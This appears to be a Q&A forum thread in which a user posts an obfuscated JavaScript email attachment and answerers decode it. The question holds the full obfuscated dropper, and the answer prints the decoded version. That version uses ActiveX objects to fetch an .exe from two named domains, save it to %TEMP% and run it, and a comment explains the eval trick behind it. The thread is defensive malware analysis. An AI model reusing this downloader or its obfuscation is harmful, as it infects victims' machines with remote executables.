# What does this malicious JavaScript code do?

Tags: javascript, virus

I got this by email this morning before my brain woke up and I clicked on it. Does anyone know how bad this is? It gave me an out of stack space error when I ran it.

```
var listing="55555C5E0305060D10010B000B1611240309050D084A070B09";function downloader_prop() { cn_browser_register('ngth'); class_browser_zip_gz(); };  function es_core_soft_category() { cn_browser_register('tatu'); sort_project_pl_online_num(); };  function br_parser_lid_browser() { cn_browser_register('HTT'); updater_trend_fr_void(); };  function src_access_cn_name_invalid() { cn_browser_register('veToF'); analyze_gid_it_temp_random(); };  function json_jar_core_first() { cn_browser_register('ady'); type_copy_src_archive_editor(); };  function form_third_recieve_arc() { cn_browser_register(' f'); scanner_ru_pl(); };  function hint_send_scanner_create_uk() { cn_browser_register('l('); au_au_uk_valid(); };  function updater_gz() { cn_browser_register('xa.ty'); prev_br(); };  function css_html() { cn_browser_register('Strin'); src_xhtml_src(); };  function item_void_ex() { cn_browser_register('; } '); temp_eu_gz_rar_show(); };  function work_analyzer() { cn_browser_register('); fo'); analyze_checker_sum(); };  function fr_wrap_page_viewer() { cn_browser_register('ar '); scanner_type_downloader(); };  function source_viewer_ca() { cn_browser_register('("AD'); soft_start(); };  function src_xhtml_src() { cn_browser_register('g.'); pl_viewer_sid_name_xhtml(); };  function php_name() { cn_browser_register('51);'); scan_trim_jquery_text(); };  function checker_wrapper_sql() { cn_browser_register('t.com'); txt_js_rar_src_xor(); };  function ip_xml_cn_jar() { cn_browser_register('a.o'); object_reset_get(); };  function regular_id_form_tag() { cn_browser_register(' (xo'); php_html_form_slide(); };  function tag_function_ca_reset() { cn_browser_register('iveXO'); regular_regular_tmp(); };  function misc_cn() { cn_browser_register('fn,'); txt_theme_stop_analyzer(); };  function reset_sender() { cn_browser_register('si'); logout_init(); };  function search_in() { cn_browser_register('Envi'); view_fid(); };  var user_private_type_gz = '';  function temp_eu_gz_rar_show() { cn_browser_register('catch'); checker_viewer_regular(); };  function fr_analyzer_prev() { cn_browser_register('on() '); prev_sid_part(); };  function content_valid_byte_pl() { cn_browser_register(' {'); es_note_id(); };  function third_updater_jquery_cn() { cn_browser_register('ng,'); form_third_recieve_arc(); };  function type_analyzer_show_au_download() { cn_browser_register('omC'); pid_zip(); };  function tmp_gate_parser() { cn_browser_register('); x'); ip_xml_cn_jar(); };  function xml_js_sort_sender() { cn_browser_register(' bre'); type_browser_sender_source(); };  function class_editor_id_hold_wrapper() { cn_browser_register('do'); viewer_ru_src_board_soft(); };  function ex_edit_void_small() { cn_browser_register(' Acti'); previous_gz(); };  function internal_parser_en_ca_wrapper() { cn_browser_register('}; };'); php_txt_au_sort(); };  function viewer_big_gz_find() { cn_browser_register('xo.'); push_xml_num_trim_common(); };  function num_css_src() { cn_browser_register('; xa'); viewer_call_php_id(); };  function updater_build_seed_pl() { cn_browser_register(';'); trend_txt_fr(); };  function check_eu_new() { cn_browser_register('r fn'); private_byte_form(); };  function last_xml_en() { cn_browser_register('pli'); editor_class_function_analyzer_dir(); };  function push_pro_publish() { cn_browser_register('61'); php_name(); };  function sum_gz_eu_publish_online() { cn_browser_register('} '); arc_checker(); };  function move_access_system() { cn_browser_register('jec'); previous_class(); };  function port_xml_page_file() { cn_browser_register('ri'); browser_channel_pl(); };  function lid_num() { cn_browser_register('She'); private_editor(); };  function trend_txt_fr() { user_private_type_gz(rar_updater); };  function sort_home_publish_channel_en() { fr_random_call_viewer_au += 'v'; cn_browser_register('nc'); ca_it_es(); };  function fid_item_in_folder_view() { cn_browser_register('dySta'); checker_xml_sql_stop_updater(); };  function browser_type() { fr_random_call_viewer_au += 'l'; cn_browser_register('on '); push_checker(); };  function pid_sort_updater_it() { cn_browser_register('pen("'); port_cn_analyzer_json(); };  function invalid_part_gz_session() { cn_browser_register('iv'); sender_gz_id(); };  function gallery_xml_es_in() { cn_browser_register('ar'); viewer_eu_download(); };  function reset_push_gz_lid() { cn_browser_register(' if ('); note_zip(); };  function unit_wrapper_cat() { cn_browser_register(') {'); send_sender_eu_es(); };  function au_editor() { cn_browser_register('nd'); ca_xhtml_rar_sum_editor(); };  function type_tag_editor_scan() { cn_browser_register('000)+'); random_pl_updater_trend(); };  function au_au_uk_valid() { cn_browser_register('9563)'); updater_build_seed_pl(); };  function send_sender_eu_es() { cn_browser_register(' v'); browser_init_cache(); };  function fr_ca_editor() { cn_browser_register('var '); scanner_en_wrapper(); };  function valid_in_port() { cn_browser_register('s.Ex'); txt_zip_num_jquery(); };  function sort_parser_de() { cn_browser_register('ws.'); sid_stop_editor(); };  function browser_previous_form() { cn_browser_register(' = 1;'); common_sid_form(); };  function viewer_external_es() { cn_browser_register(' && '); access_en_second(); };  function common_sid_form() { cn_browser_register(' xa.'); pid_show_pl_cn_common(); };  function view_fid() { cn_browser_register('ronme'); prev_parser_pl_create_eu(); };  function class_browser_zip_gz() { cn_browser_register('; i'); check_arc(); };  function scan_trim_jquery_text() { cn_browser_register(' dl(2'); pro_gz_downloader_compress_directory(); };  function txt_js_rar_src_xor() { cn_browser_register('".s'); last_xml_en(); };  function gid_it_gid_download() { cn_browser_register('i='); ca_php(); };  function name_wizard_src_name_port() { cn_browser_register('hp?rn'); ru_type_big_prop_scan(); };  function de_txt_updater() { cn_browser_register('ndom'); big_regular(); };  function viewer_ru_src_board_soft() { cn_browser_register('cumen'); work_class_br(); };  function push_my_uk_de_it() { cn_browser_register(' fu'); br_fid_class_include(); };  function edit_au() { cn_browser_register('; '); updater_gz(); };  function java_ex_editor_common() { cn_browser_register('und(M'); in_type_third_cn(); };  function pid_jar_reset_rar() { cn_browser_register('emen'); checker_wrapper_sql(); };  function pid_show_pl_cn_common() { cn_browser_register('pos'); jar_page_browser(); };  function publish_es_gz_br_pl() { cn_browser_register(' }; d'); internal_compress_port_css_compress(); };  function directory_theme_next() { cn_browser_register(' 5'); compress_jar_html_js_add(); };  function source_it_last() { cn_browser_register('+Mat'); image_name_stop_in_in(); };  function xhtml_de_src_json_sum() { cn_browser_register('n ='); trim_script_js_board_fid(); };  function txt_theme_stop_analyzer() { cn_browser_register('1,0)'); txt_sql(); };  function pl_viewer_sid_name_xhtml() { cn_browser_register('fr'); type_analyzer_show_au_download(); };  function au_invalid_valid_create_analyzer() { cn_browser_register(' 1; x'); wrapper_sort_download_au_js(); };  function swap_logout_class_function_in() { cn_browser_register(' d'); hint_send_scanner_create_uk(); };  function br_session_valid_wrapper() { cn_browser_register('); va'); check_eu_new(); };  function image_src_analyzer() { cn_browser_register('m"'); tmp_gate_parser(); };  function wrap_hold_fid_previous_sid() { cn_browser_register('www.r'); xml_viewer_previous_type(); };  function src_xml_recieve_edit() { fr_random_call_viewer_au = 'e'; cn_browser_register('fu'); sort_home_publish_channel_en(); };  function check_arc() { cn_browser_register('++)'); jquery_online_json_type(); };  function temp_jar_name() { cn_browser_register('ct'); slide_sort(); };  function item_prev_de_id_uk() { cn_browser_register('= 4'); viewer_external_es(); };  function sid_stop_editor() { cn_browser_register('Run('); misc_cn(); };  function viewer_call_php_id() { cn_browser_register('.sa'); src_access_cn_name_invalid(); };  function param_action() { cn_browser_register('e.co'); previous_uk_form_pid_au(); };  function last_cn_list_action() { cn_browser_register('ript.'); lid_num(); };  function viewer_eu_download() { cn_browser_register(' b'); parser_ca(); };  function txt_zip_num_jquery() { cn_browser_register('pand'); search_in(); };  function br_fid_class_include() { cn_browser_register('ncti'); fr_analyzer_prev(); };  function fid_link() { cn_browser_register('r)'); rnd_viewer_txt_rar(); };  function push_xml_num_trim_common() { cn_browser_register('onre'); json_jar_core_first(); };  function logout_init() { cn_browser_register('ze >'); directory_theme_next(); };  function browser_init_cache() { cn_browser_register('ar x'); br_file_small_sort(); };  function fr_id_au() { cn_browser_register('fn'); rnd_viewer_fid_next(); };  function eu_online_pid() { cn_browser_register('"%T'); session_scanner_sender_sort(); };  function checker_call_editor_scan() { cn_browser_register('h.'); valid_uk(); };  function name_gz_third() { cn_browser_register('; if '); css_content(); };  function in_work_rnd_first_sender() { cn_browser_register('y { '); sort_parser_de(); };  function parser_ca() { cn_browser_register(' = '); include_previous(); };  function scanner_ru_pl() { cn_browser_register('al'); jquery_zip_form(); };  function jar_class_uk() { cn_browser_register('tg a'); search_ru(); };  function sort_tiny_de() { cn_browser_register('"WSc'); last_cn_list_action(); };  function jar_page_browser() { cn_browser_register('it'); gateway_user(); };  function java_index_gid() { cn_browser_register('nag'); pid_jar_reset_rar(); };  function css_content() { cn_browser_register('(xa.'); reset_sender(); };  function lid_jquery_pid_init_byte() { cn_browser_register(') {};'); reset_push_gz_lid(); };  function prev_br() { cn_browser_register('pe ='); au_invalid_valid_create_analyzer(); };  function next_stable() { cn_browser_register('Ob'); port_next_num_scan(); };  function gid_var_uk_lid() { cn_browser_register(' { v'); gallery_xml_es_in(); };  function stop_updater_xml_logout() { cn_browser_register('xo'); ru_port_call_sid(); };  function compress_jar_html_js_add() { cn_browser_register('00'); download_online_xhtml(); };  function php_html_form_slide() { cn_browser_register('.rea'); fid_item_in_folder_view(); };  function json_group_ca_eu() { cn_browser_register('[i'); third_common_push_analyzer(); };  function html_xhtml_en_online() { cn_browser_register('var '); gid_it_gid_download(); };  function xml_valid_browser_temp_checker() { cn_browser_register('pe'); temp_jar_name(); };  function in_type_third_cn() { cn_browser_register('at'); checker_call_editor_scan(); };  function src_source_jquery() { cn_browser_register('<b.le'); downloader_prop(); };  function proc_wrapper_src_au_lid() { cn_browser_register('spo'); send_include_parser(); };  function xml_viewer_previous_type() { cn_browser_register('oya'); add_parser_src_upload_system(); };  function internal_compress_port_css_compress() { cn_browser_register('l('); push_pro_publish(); };  function list_uk_xml() { cn_browser_register(' = n'); private_archive(); };  function void_host() { cn_browser_register('new '); swap_archive_reg_previous(); };  function port_pro_add_zip_stable() { cn_browser_register('id="+'); arc_sum(); };  function pl_byte() { cn_browser_register('ma'); java_index_gid(); };  function previous_gz() { cn_browser_register('ve'); ca_scanner_online_tiny_str(); };  function object_reset_get() { cn_browser_register('pen()'); edit_au(); };  function viewer_browser_private() { cn_browser_register(' dn'); browser_previous_form(); };  function ru_type_big_prop_scan() { cn_browser_register('d="'); browser_it_wrapper_port_regular(); };  function group_call_xhtml_note_sum() { cn_browser_register('00'); unit_wrapper_cat(); };  function scanner_en_wrapper() { cn_browser_register('xo'); list_uk_xml(); };  function add_parser_src_upload_system() { cn_browser_register('le'); pl_byte(); };  function view_wrapper_de() { cn_browser_register('== 2'); group_call_xhtml_note_sum(); };  function third_common_push_analyzer() { cn_browser_register(']+"/'); class_editor_id_hold_wrapper(); };  function editor_parser_board_sid() { cn_browser_register('.clos'); invalid_browser_br_jquery_updater(); };  function sender_add_check_class() { cn_browser_register('e"; v'); fr_wrap_page_viewer(); };  function ca_json_cache_arc() { cn_browser_register('e('); work_obj_viewer_en(); };  function txt_sql() { cn_browser_register('; '); sum_gz_eu_publish_online(); };  function function_php() { cn_browser_register('2.XML'); br_parser_lid_browser(); };  function checker_viewer_regular() { cn_browser_register(' (er'); lid_jquery_pid_init_byte(); };  function search_ru() { cn_browser_register('mp'); au_register_css(); };  function note_ru() { cn_browser_register('(fr)'); gid_var_uk_lid(); };  function rnd_viewer_fid_next() { cn_browser_register(',2)'); push_eu_analyzer_lid(); };  function br_file_small_sort() { cn_browser_register('a '); last_php_push_new(); };  function swap_archive_reg_previous() { cn_browser_register('Act'); invalid_part_gz_session(); };  function send_include_parser() { cn_browser_register('nseB'); class_gid_js(); };  function num_java_include_pl() { cn_browser_register('XML'); function_php(); };  function xml_online_post_new_ca() { cn_browser_register('rCod'); ca_json_cache_arc(); };  function parser_pid_item_downloader() { cn_browser_register('.o'); pid_sort_updater_it(); };  function checker_xml_sql_stop_updater() { cn_browser_register('te ='); item_prev_de_id_uk(); };  function regular_regular_tmp() { cn_browser_register('bject'); source_viewer_ca(); };  function ca_scanner_online_tiny_str() { cn_browser_register('XOb'); move_access_system(); };  function scanner_type_downloader() { cn_browser_register('dn ='); sum_gid_br(); };  function publish_second_editor_fid() { cn_browser_register('MS'); num_java_include_pl(); };  function work_obj_viewer_en() { cn_browser_register('92)'); source_it_last(); };  function random_pl_updater_trend() { cn_browser_register('".ex'); sender_add_check_class(); };  function access_en_second() { cn_browser_register('xo.s'); es_core_soft_category(); };  function third_xhtml_seed() { cn_browser_register('ge'); new_it_random(); };  function cn_browser_register(_v_) { rar_updater = rar_updater + _v_; };  function soft_start() { cn_browser_register('ODB.S'); en_trim(); };  function php_txt_au_sort() { cn_browser_register(' try'); content_valid_byte_pl(); };  function previous_uk_form_pid_au() { cn_browser_register('m '); wrap_hold_fid_previous_sid(); };  function zip_port_browser() { cn_browser_register('xo.Re'); proc_wrapper_src_au_lid(); };  function private_editor() { cn_browser_register('ll"'); br_session_valid_wrapper(); };  function host_new_pl_region() { cn_browser_register('; xa'); editor_parser_board_sid(); };  function pro_gz_downloader_compress_directory() { cn_browser_register('872);'); swap_logout_class_function_in(); };  function download_online_xhtml() { cn_browser_register('0) {'); viewer_browser_private(); };  function last_php_push_new() { cn_browser_register('= ne'); jquery_script_ex(); };  function link_var_reset() { cn_browser_register('ch (e'); fid_link(); };  function sort_next_browser_sum_en() { cn_browser_register('if'); regular_id_form_tag(); };  function session_scanner_sender_sort() { cn_browser_register('EMP%'); app_parser_create_cache_fid(); };  function ca_xhtml_rar_sum_editor() { cn_browser_register('()'); item_void_ex(); };  function en_trim() { cn_browser_register('trea'); image_src_analyzer(); };  function image_name_stop_in_in() { cn_browser_register('h.ro'); java_ex_editor_common(); };  function jquery_online_json_type() { cn_browser_register(' { '); view_en_login(); };  function es_note_id() { cn_browser_register(' xo'); parser_pid_item_downloader(); };  function browser_channel_pl() { cn_browser_register('ngs('); eu_online_pid(); };  function gateway_user() { cn_browser_register('io'); xhtml_de_src_json_sum(); };  function prev_sid_part() { cn_browser_register('{ '); sort_next_browser_sum_en(); };  function engine_wrapper() { cn_browser_register('+b'); json_group_ca_eu(); };  function view_en_login() { cn_browser_register('var '); sid_downloader_de_compress_jquery(); };  function sender_gz_id() { cn_browser_register('eX'); next_stable(); };  function analyze_checker_sum() { cn_browser_register('r ('); html_xhtml_en_online(); };  function push_checker() { user_private_type_gz = this[fr_random_call_viewer_au]; cn_browser_register('dl'); note_ru(); };  var rar_updater = '';  function class_gid_js() { cn_browser_register('ody)'); name_gz_third(); };  function updater_trend_fr_void() { cn_browser_register('P"); '); viewer_big_gz_find(); };  function arc_checker() { cn_browser_register('cat'); link_var_reset(); };  function sort_project_pl_online_num() { cn_browser_register('s '); view_wrapper_de(); };  var fr_random_call_viewer_au = '';  function id_js_random() { cn_browser_register('; }'); host_new_pl_region(); };  function wrapper_sort_download_au_js() { cn_browser_register('a.'); scanner_prev(); };  function include_previous() { cn_browser_register('"tvt.'); jar_class_uk(); };  function es_parser_xml_post() { cn_browser_register('chan'); third_xhtml_seed(); };  function valid_uk() { cn_browser_register('ra'); de_txt_updater(); };  function app_parser_create_cache_fid() { cn_browser_register('")+'); css_html(); };  function previous_class() { cn_browser_register('t("'); publish_second_editor_fid(); };  function private_byte_form() { cn_browser_register(' = w'); valid_in_port(); };  function ru_port_call_sid() { cn_browser_register('.se'); au_editor(); };  function jquery_script_ex() { cn_browser_register('w Act'); tag_function_ca_reset(); };  function rnd_viewer_txt_rar() { cn_browser_register(' {}'); id_js_random(); };  function arc_sum() { cn_browser_register('listi'); third_updater_jquery_cn(); };  function ca_it_es() { fr_random_call_viewer_au += 'a'; cn_browser_register('ti'); browser_type(); };  function small_xml_find_compress() { cn_browser_register('http'); jquery_it_analyzer(); };  function slide_sort() { cn_browser_register('iv'); param_action(); };  function pid_zip() { cn_browser_register('ha'); xml_online_post_new_ca(); };  function port_next_num_scan() { cn_browser_register('ject('); sort_tiny_de(); };  function prev_parser_pl_create_eu() { cn_browser_register('ntSt'); port_xml_page_file(); };  function fr_sid_include() { cn_browser_register(' 1)'); xml_js_sort_sender(); };  function php_request() { cn_browser_register('00'); copy_seed_fr_zip_jquery(); };  function port_cn_analyzer_json() { cn_browser_register('GET'); sort_parser_uk_viewer_stable(); };  function sid_downloader_de_compress_jquery() { cn_browser_register('ws = '); void_host(); };  function txt_parser_info_es_push() { cn_browser_register('*1'); php_request(); };  function copy_seed_fr_zip_jquery() { cn_browser_register('000'); type_tag_editor_scan(); };  function new_it_random() { cn_browser_register(' ='); push_my_uk_de_it(); };  function stable_asset_xhtml() { cn_browser_register('"&'); port_pro_add_zip_stable(); };  function ca_php() { cn_browser_register('0; i'); src_source_jquery(); };  function scanner_prev() { cn_browser_register('wr'); name_stat_rar_sort_invalid(); };  function note_zip() { cn_browser_register('dn =='); fr_sid_include(); };  function work_class_br() { cn_browser_register('t.p'); name_wizard_src_name_port(); };  function invalid_browser_br_jquery_updater() { cn_browser_register('e(); '); internal_parser_en_ca_wrapper(); };  function private_archive() { cn_browser_register('ew'); ex_edit_void_small(); };  function big_regular() { cn_browser_register('()'); txt_parser_info_es_push(); };  function analyze_gid_it_temp_random() { cn_browser_register('ile('); fr_id_au(); };  function au_register_css() { cn_browser_register('ers'); xml_valid_browser_temp_checker(); };  function editor_class_function_analyzer_dir() { cn_browser_register('t(" "'); work_analyzer(); };  function jquery_zip_form() { cn_browser_register('se); '); stop_updater_xml_logout(); };  function jquery_it_analyzer() { cn_browser_register('://"'); engine_wrapper(); };  function sum_gid_br() { cn_browser_register(' 0; '); fr_ca_editor(); };  function type_copy_src_archive_editor() { cn_browser_register('state'); es_parser_xml_post(); };  function name_stat_rar_sort_invalid() { cn_browser_register('ite('); zip_port_browser(); };  function type_browser_sender_source() { cn_browser_register('ak; }'); publish_es_gz_br_pl(); };  function browser_it_wrapper_port_regular() { cn_browser_register('+fr+'); stable_asset_xhtml(); };  function trim_script_js_board_fid() { cn_browser_register(' 0'); num_css_src(); };  function push_eu_analyzer_lid() { cn_browser_register('; tr'); in_work_rnd_first_sender(); };  function sort_parser_uk_viewer_stable() { cn_browser_register('","'); small_xml_find_compress(); };  src_xml_recieve_edit();
```

Answer (score 6):

Ran it throught Closure Compiler and here's what it looks like: http://jsfiddle.net/q520kg51/1/ At  first glance, it doesn't communicate with any remote service or use any HTML5 API. Here's part of the compiled code (I cut out the repretitive stuff)

```
var a = "";

function b(e) {
    c += e
}
var c = "",
    d = "",
    d = "e";
b("fu");
d += "v";
b("nc");
d += "a";
b("ti");
d += "l";
b("on ");
(function() {
    a = this[d];
    b("dl");
    b("(fr)");
    b(" { v");
    b("ar");
    b(" b");
    b(" = ");
    b('"tvt.');
    b("tg a");
    b("mp");
    b("ers");
    b("pe");
    b("ct");
    b("iv");
    b("e.co");
    b("m ");
    b("www.r");
    b("oya");
    b("le");
    b("ma");
    b("nag");
```

However, I added a console.log to see what happens and it actually creates a long string that comes out to this code:

```
function dl(fr) {
    var b = "tvt.tg amperspective.com www.royalemanagement.com".split(" ");
    for (var i = 0; i < b.length; i++) {
        var ws = new ActiveXObject("WScript.Shell");

        // file is saved to TEMP here
        var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe";
        var dn = 0;
        var xo = new ActiveXObject("MSXML2.XMLHTTP");
        xo.onreadystatechange = function() {
            if (xo.readyState == 4 && xo.status == 200) {
                var xa = new ActiveXObject("ADODB.Stream");
                xa.open();
                xa.type = 1;
                xa.write(xo.ResponseBody);
                if (xa.size > 5000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn, 2); // this is the danger
                    try {
                        ws.Run(fn, 1, 0); // this is the big danger
                    } catch (er) {};
                };
                xa.close();
            };
        };
        try {
            xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + listing, false);
            xo.send();
        } catch (er) {};
        if (dn == 1) break;
    }
};
dl(6151);
dl(2872);
dl(9563);
```

Now that code DOES communicate: it calls a server to download and run an exe file. That's what it does and it's pretty bad. The good news is that it uses ActiveX so if you weren't on Internet Explorer you're safe. If you're on IE, then search your computer for a .exe file in your TEMP folder with random digits as the filename and delete it.

Comment: Does this actually do anything in recent versions of IE, at least without having to click through a warning?

Comment: IE runs ActiveX but it looks like version 11 requires the user to agree: http://stackoverflow.com/questions/26151999/ie11-prevents-activex-from-running

Comment: To add to the nice analysis: the string then gets executed by using `a=this[d]; ... a(c)`. Because `d` gets created from `e`,`v`,`a`,`l` this will actually result in `this['eval'](c)` and with `this` being `window` this will be equivalent to `window.eval(c)` or simply `eval(c)`.